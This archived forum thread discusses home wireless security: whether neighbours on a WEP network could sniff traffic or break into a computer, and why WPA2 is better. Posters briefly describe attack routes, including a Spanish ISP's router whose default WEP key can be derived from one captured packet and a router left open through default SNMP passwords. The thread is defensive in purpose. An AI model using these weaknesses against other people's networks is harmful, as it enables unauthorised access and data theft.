can they hack into my computer?

Hello

I've had set up WEP encryption in my home network for more than a year. Only some days ago I gave WPA a try, just out of curiousity and maybe to learn something out. The reason for me not doing it before is that I don't feel as such a horrible thing if my neighbour uses my internet connection to do some web surfing and check mail, for instance.

Now, I read somewhere that the threat could be somebody gaining access to my computer and therefore doing all sort of things with it. I don't know whether to believe this. Wouldn't an attacker still need my root/user password to get any further? I don't share files between computers, could somebody still do something through some open ports I have for some applications? Is there a reason to be worried, beyond the less important case of an ocasional freeloader?

Regards

Reply to
Jose Rodriguez
Loading thread data ...

Bingo! You hit it. And if a NAT f/w prevents hosts "out there" from accessing such ip/port, like with properly secured access, you've removed one threat dimension.

Your ISP may not be thrilled if you're providing neighborhood hot-spot, either.

J

Reply to
barry

Jose Rodriguez hath wroth:

Right. Now how would you know if your neighbor is using your system? How would you know that they're using it to surf the web, and not to hack into your system, or to spew spam? Got any monitoring in place?

Not really. All they want is enough information to pull off an identity theft. They don't need to hack into your machine to do that. Simply sniffing yout traffic and extracting your unencrypted email is usually sufficient. The only thing that's stopping someone is your WEP encryption, which can be cracked in a few minutes. Note that they don't need to enter your network or dig through your computer, just sniff the traffic.

Mostly true. I determined hacker could enter your computer via the wireless and pull out some emailed bank statements, credit card payment statements, saved passwords, and whatever else looks interesting. At wireless speeds, they could copy most of the junk under My Documents and various email depositories fairly quickly, and inspect them at their liesure. Meanwhile, they could leave you with a virus, not be cause they're malevolent, but simply to distract you.

They would need some way to get past your NAT and firewall. That's not a trivial exercise. However MS makes it easier by punching holes in the firewall with UPnP. Other applications add additional holes in the firewall until it looks like Swiss cheeze. Remote control and tech support applications are a fair candidate for an external attack.

However, that's usually too sloppy and too much work. It's much easier to trick you into installing some remote control software on your machine, and then taking over control from the outside. Those are called Trojan Horse programs and are the basis of most of the "BotNet" systems that are spewing spam and precipitating DDOS attacks. If someone can get you to install or run one of these apps, using "social engineering", there's no need for them to try to get past your firewall.

Oh yes, but it would usually require a security vulnerability in some application that uses that open port to take advantage of it. There are plenty such vulnerabilities out there, but they usually get patched and fixed fairly quickly. However, the trojan horse problem doesn't require a buggy application and will work quite nicely on a perfectly functional computah.

Yes. The real worry is someone sniffing your traffic and pulling off an identity theft. That's why you need and should use WPA or WPA2.

Reply to
Jeff Liebermann

You're right, and I've been pointed out another problem, what if somebody is using your system with illegal purposes you might end getting the blame for? (although it would be quite stupid using next door conection to download child pornography, but who knows).

I haven't thought about that, it is worrying.

That's serious, but for that to work you have to leave things opened and clear; I would only store passwords in an encrypted format and a rather obscure location. And at least online banking is made through a secure conection, isn't it?

I guess that's one of the reasons why Linux is inherently more secure than Windows--software comes from digitally signed, official repositories, for instance. On the other hand, I still have to worry about things like remote registry, UPnP, remote assistance, server service, etc for my partner runs Vista...so boring doing these things.

After this and some other posts in other list I believe I get the idea of the open ports thing. I just didn't get how would it be possible to pass through something it was not intended to do so.

Well, I'm convinced, I'll stuck with my WPA2 thing, making sure the password is strong enough.

Thanks for the replies.

Reply to
Jose Rodriguez

Jose Rodriguez hath wroth:

It's possible, but (to the best of my knowledge) it hasn't happened yet. There have been some arrests and stupid convictions for using a wireless connection without permission, but none for anything involving liability. The whole issue of responsibility for wireless security is currently unclear and I am NOT an expert or attorney. However, I suggest you do whatever it takes to not become a test case.

There are multiple levels of protection. The most obvious is to encrypt the wireless traffic so that nobody enters you LAN in the first place. That's the WPA and WPA2 encrytion.

However, if someone can enter via wireless, what other defenses do you have? If you have shared folders, are they open to anyone to read or are they password protected? Do you have intrusion detection software running? Do you use encrypted folders (XP Pro only)? Are the documents themselves encrypted? Can they be copied, even if they are encrypted?

The last is fairly important. Most people assume that a document with simple encrytion is safe. That really depends on the level of encryption and the time allowed. The encryption used may be relatively secure if I had a limited amount of time to recover the key. However, if I can copy the encrypted file to my own machine, I can do a brute force or better crack at my liesure. That would require a more secure system. I've also found that most users tend to use the same password for ALL their encrypted documents, so cracking one will usually crack them all. Note the number of "password recovery" programs and services available:

etc.

My personal solution is to NOT store anything of value on the machine. The really important stuff is on a removeable USB thumb drive. It's also encrypted, password protected, and backed up with a copy somewhere. Not ideal, but with the whole neighborhood on my neighborhood wireless LAN, it's prudent.

Nope. There are distributions that come that way, but most of the stuff I run isn't. The stuff I've seen that is signed, is self authenticating and does not use an independent certificate authority. Therefore, it could be forged. Improbable, but possible.

The major difference between Linux and Windoze security is philosophy. Linux usually comes secure by default with all the security features enabled on installation. If you want to do something disgusting, then you have to do it intentionally. Windoze is built for user convenience and requires the user to impliment and apply security. At least that's the way they started. Both extremes found that they had to compromise somewhat in order to make their products usable. Linux is becoming more permissive on instalation and Windoze at least impliments basic password security on installation. Since there's no "right answer", the issue will continue to be a moving target. Also, just because the vendor delivers a product that's more convenient than secure, doesn't mean you have to perpetuate the mistake.

Unfortunately, the wireless router industry has done the worst possible thing. Most wireless routers are wide open and totally insecure on installation. Open the box, plug it in, and in most cases, it will function. That's a great OBE (out of box experience) but doesn't make for a very secure system. Eventually, someone will sue a wireless router manufacturer for damaged resulting from the false perception of security, and things might change. Meanwhile, only 2-wire has gotten the clue and delivers their routers secure by default. Again, just because the router manufacturers deliver insecure products, doesn't mean that you have to perpetuate the mistake.

Reply to
Jeff Liebermann

I totally agree, when I said "I would" I meant exactly that, i.e. that I would do it that way if I had to. An online banking password stored in your computer is probably a way of looking for potential trouble. On the other hand, being realistic, I don't think that anybody would scan my hard drive to afterwards do a brute force attack on some suspiciously encrypted strings of text trying to find out whether they find anything interesting--unless they were pretty sure that they could find it, which it's not obviously the case for I am not (and I don't look like) a very wealthy person. Applying the same reasoning, I don't hold (and I don't look like doing so) any extra important and sensitive information somebody could make any profit out of it. Let's face it, for average Joe--like myself--some of the precautions out there available are overkilling. The same, obviously, does not apply to the corporate world, and knowing how to protect your digital data is, in any case, highly recommendable.

A similar issue arose in other list when somebody asked how reliable, in terms of security, can SE Linux possibly be, given that it was first developed by the NSA. I agree with some of the opinions given there in that, at the end of the day, you will always have to rely in somebody unless you develop your own OS and your own software--and you don't connect to the internet unless you have your own ISP business, FWIW. I don't know what you run, but there is a qualitative difference between installing something that came from an official signed repository (yes, you have to rely in, say, Debian developers) and running the last supercool screensaver or useless utility (as many windows users do, not to talk about warez). Another point is the difference between open source vs closed one. I'll give you an example: some time ago I downloaded and installed VMWare and it all went fine, but I found the advertising mail they used to send me somewhat annoying. At some point I installed Samba to share files between my Linux and my virtual XP machine, with the consequence of receiving an e-mail inmediately afterwards selling me the goodness of VMWare products connected through Samba servers...I may be seing ghosts here, I don't know.

Spot on, I guess, but how many users don't do anything about anything with their systems? I myself, when on windows used to close down everything I could to avoid potential risks, as well as keeping a bare minimum set of security standards like setting separate unprivileged accounts, firewall, antivirus, antispyware and so on, and yet didn't bother to set up WPA till a couple of weeks ago out of pure lazyness and ignorance.

One terrific example of worse case scenario I know of has place in Spain. Company X sells this nice wireless routers that provides with their internet package. User Y believes he's safe because it came with encryption, and that sounds cool. What Y probably does not know is that the default ssid of every X router is something like "WLAN ZW", being ZW, if I remember correctly, the last two digits of the router's MAC address, and being the WEP key a combination of the ssid and the whole MAC. Forget about injecting, deauth, statistical attacks whatsoever: one single data packet gathered gives you the key after an extremely quick dictionary search. I'd be quite angry if I was with company X.

Regards

Reply to
Jose Rodriguez

Jose Rodriguez hath wroth:

True. That takes too long. Just grab the Firefox or IE stored passwords. That's where all the goodies are usually buried. Got a bank account password saved in there?

I would be happy just to have a CRC on the distribution so that I know that it has been modified. Many large distributions do that, but usually to determine if there's been download corruption, not as a security check.

It's probably true, but I'm too lazy to check the VMWare privacy policy. My guess is that they you have signed away some right for them to obtain a list of installed applications in order to improve their product quality. The road to hell is paved with the best of intentions.

Shhhhsh. Don't tell anyone. That kind of user supplies the bulk of my business. If they ever understood that they are personally responsible for security, and not Microsoft, I would be out of business. The company motto is "If this stuff worked, you wouldn't need me".

Not me. I download, install, tinker, and often break just about anything I find that's interesting. If it blows up, I restore with various tools (ERUNT, system restore, DVD backup, etc). I want to have things break on my machine before I inflict them on my customers. Also, it adds to my experience level, which gives me a few days lead time on the inevitable questions from customers.

The one exception is my office bookkeeping machine. It's almost totally isolated from the rest of the LAN and WAN. It does connect to the internet for updates, but only briefly. I have mirrored backups, encrypted filesystems, and secure access. If it goes, so does my business, so I'm very careful with it.

Lovely. Don't forget about "back door" passwords and multiple points of entry. For example, one very secure router forgot to change the SNMP passwords and left them at the defaults of public and private. Turn on SNMP, and the router is wide open. I can even change the admin password via SNMP. Fortunately, that's been fixed, but it took well over a year to convince them to do it.

Reply to
Jeff Liebermann

Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.